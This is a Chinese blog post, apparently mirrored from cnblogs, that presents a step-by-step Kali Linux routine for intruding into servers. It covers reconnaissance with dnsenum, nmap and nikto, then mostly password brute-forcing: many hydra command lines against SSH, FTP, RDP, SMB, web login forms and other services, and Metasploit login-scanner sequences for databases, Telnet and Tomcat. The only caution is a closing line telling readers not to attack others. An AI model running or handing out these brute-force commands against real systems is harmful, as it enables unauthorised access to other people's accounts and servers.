zoukankan      html  css  js  c++  java
  • kali入侵服务器的那一套实战

    dnsenum  -enum       xxxxx.com    枚举出网站的所有域名和服务器的ip地址

    打开百度查询ip地址的所在地

    whatweb  xxxx.com  查看那些网站入口可以访问   以状态码为准

    whois  ip地址  查看ip所在地

    nmap -sS     ip           匿名查看服务器开放的端口

    nmap  -O或-A  查看服务器的什么系统

    nmap -sV  查看服务器开放端口以及服务器版本

    [nikto]

    漏洞扫描
    -T 选项包含了许多小选项,-T 9 表示扫描sql注入漏洞
    0检查文件上传页面
    1检查web日志
    2检查错误配置或默认文件
    3检查信息泄露问题
    4检查XSS/Script/Html问题
    5从根目录检查是否存在可访问的文件
    6检查拒绝服务器问题
    7从任意文件检索是否存在可访问文件
    8检查是否存在系统命令执行漏洞
    9检查sql注入漏洞
    b识别安装的软件版本
    c检查源代码泄露问题
    x反向链接选项

    nikto  -h  ip    普通扫描全部漏洞

    nikto -h  -h  ip  -p 端口号       扫描指定端口漏洞

    nikto -h ip -C all  all表示CGI目录猜解

    nikto -h ip  -T 9  扫描sql注入漏洞

    知道漏洞后开始爆破

    [hydra(九头蛇)]

    -l 指定爆破帐号
    -w 指定每个县城的回应时间为10
    -P 指定密码字典
    -t 指定爆破线程
    -v 指定现实爆破过程
    -f 查找到第一个可以使用的id和密码的时候停止破解
    hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 ssh
    hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql
    hydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22
    暴力破解:
    参数:
    -R 继续从上一次进度接着破解
    -S 大写,采用SSL链接
    -s 小写,可通过这个参数指定非默认端口
    -l 指定破解的用户,对特定用户破解
    -L 指定用户名字典
    -p 小写,指定密码破解,少用,一般是采用密码字典
    -P 大写,指定密码字典
    -e 可选选项,n:空密码试探,s:使用指定用户和密码试探
    -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
    -M 指定目标列表文件一行一条
    -o 指定结果输出文件
    -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
    -t 同时运行的线程数,默认为16
    -w 设置最大超时的时间,单位秒,默认是30s
    -v /-V显示详细过程

    各协议的具体命令:
    格式+示例:

    1、破解ssh:
    hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

    2、破解ftp:
    hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

    3、get方式提交,破解web登录:
    hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

    4、post方式提交,破解web登录:
    hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
    参数说明:
    -t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
    10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示

    5、破解https:
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    6、破解teamspeak:
    hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak

    7、破解cisco:
    hydra -P pass.txt 10.36.16.18 cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

    8、破解smb:
    hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb

    9、破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3

    10、破解rdp:
    hydra ip rdp -l administrator -P pass.txt -V

    11、破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://10.36.16.18
    -------------------------------------------------------------------
    Kali Linux(Metasploit口令猜解模块)

    Metasploit口令猜解模块——

    SSH服务口令猜解:

    msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模块)

    msf auxiliary(ssh_login) > show options (查看选项)

    msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目标)

    msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(ssh_login) > set THREADS 50(线程)

    msf auxiliary(ssh_login) > exploit (开始)

    Telnet口令猜解:

    msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模块)

    msf auxiliary(telnet_login) > show options (查看选项)

    msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目标)

    msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(telnet_login) > exploit (开始)

    Samba口令猜解:

    msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)

    msf auxiliary(smb_login) > show options (查看选项)

    msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目标)

    msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(ssmb_login) > exploit(开始)

    Mysql口令猜解:

    msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模块)

    msf auxiliary(mysql_login) > show options (查看选项)

    msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)

    msf auxiliary(mysql_login) > set USERNAME root(用户名字典,或指定用户)

    msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(mysql_login) > exploit(开始)

    Postgresq口令猜解:

    msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模块)

    msf auxiliary(postgres_login) > show options (查看选项)

    msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目标)

    msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(postgres_login) > exploit (开始)

    Mssql口令猜解:

    msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模块)

    msf auxiliary(mssql_login) > show options (查看选项)

    msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目标)

    msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(mssql_login) > exploit(开始)

    Tomcat口令猜解:

    msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模块)

    msf auxiliary(tomcat_mgr_login) > show options(查看选项)

    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目标)

    msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用户名字典,或指定用户)

    msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(tomcat_mgr_login) > exploit(开始)

    hydra  -l   root   -P  /password.txt -vV  -t 10 -f  ip   ssh

    也可以写一个python脚本爆破

    隆重声明注意自己的行为,不要搞别人,人外有人,天外有天!

  • 相关阅读:
    积水路面Wet Road Materials 2.3
    门控时钟问题
    饮料机问题
    Codeforces Round #340 (Div. 2) E. XOR and Favorite Number (莫队)
    Educational Codeforces Round 82 (Rated for Div. 2)部分题解
    Educational Codeforces Round 86 (Rated for Div. 2)部分题解
    Grakn Forces 2020部分题解
    2020 年百度之星·程序设计大赛
    POJ Nearest Common Ancestors (RMQ+树上dfs序求LCA)
    算法竞赛进阶指南 聚会 (LCA)
  • 原文地址:https://www.cnblogs.com/duanlinxiao/p/11910370.html
Copyright © 2011-2022 走看看